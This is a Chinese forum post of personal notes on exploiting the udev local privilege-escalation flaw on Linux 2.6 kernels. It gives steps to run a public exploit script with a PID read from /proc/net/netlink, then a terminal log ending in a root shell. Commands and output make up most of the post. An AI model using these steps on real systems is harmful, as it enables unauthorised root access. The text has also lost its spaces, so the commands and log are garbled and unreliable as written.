UDEV本地溢出漏洞利用手记

[复制链接]
查看175 | 回复0 | 2012-4-1 19:19:26 | 显示全部楼层 |阅读模式
这段时间UDEV溢出漏洞很火,在虚拟机上做了下试验,发现确实很好用。

貌似通杀范围很广
1.将http://www.milw0rm.com/exploits/8478保存为一个shell文件,也可以随便命名,例如我后面命名为a
2.查找udev的第一个socket的PID,可以通过执行如下命令获得:

cat/proc/net/netlink
3.将出现在第一行的PID减去1,作为参数,例如

skEthPidGroupsRmemWmemDumpLocks

cfe9ce0000000000000000000000
这个PID是0,减去1后得到-1
4.sha-1(如果失败了,多执行几次)
下面是一次成功的演示(我失败了N次,本来以为系统不受影响的,后来听说2.6内核的都受影响,所以多尝试了几次,忽然间看到一个可爱的#,激动)
bttmp$cat/proc/net/netlink

skEthPidGroupsRmemWmemDumpLocks

cfe9ce00000000000000000000002

cf8f3800600000000000000000002

cfa96400800000000000000000002

cfe130001000000000000000000002

cff57c001200000000000000000002

cfe9cc001500000000000000000002

cff576001510600000000100000000002

c12a30001600000000000000000002

c12a32001800000000000000000002

bttmp$sha-1

suid.c:Infunction'main':

suid.c:3:warning:incompatibleimplicitdeclarationofbuilt-infunction'execl'

/usr/lib/gcc/i486-slackware-linux/4.1.2/../../../../i486-slackware-linux/bin/ld:cannotopenoutputfile/tmp/suid:Permissiondenied

collect2:ldreturned1exitstatus

cp:`libno_ex.so.1.0'and`/tmp/libno_ex.so.1.0'arethesamefile

sh-3.1#id

uid=0(root)gid=0(root)groups=10(wheel)

sh-3.1#uname-a

Linuxbt2.6.21.5#4SMPThuApr1004:23:56GMT2008i686Intel(R)Pentium(R)DualCPUE2140@1.60GHzGenuineIntelGNU/Linux


------------------------郁闷的分割线----------------------------------------------------------------------
后来又反复测试了几十次,才能够再成功一次。
bttest$bashb-1

suid.c:Infunction'main':

suid.c:3:warning:incompatibleimplicitdeclarationofbuilt-infunction'execl'

sh-3.1$exit----------->又失败了

exit

bttest$bashb-1

suid.c:Infunction'main':

suid.c:3:warning:incompatibleimplicitdeclarationofbuilt-infunction'execl'

sh-3.1#--------------->成功
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则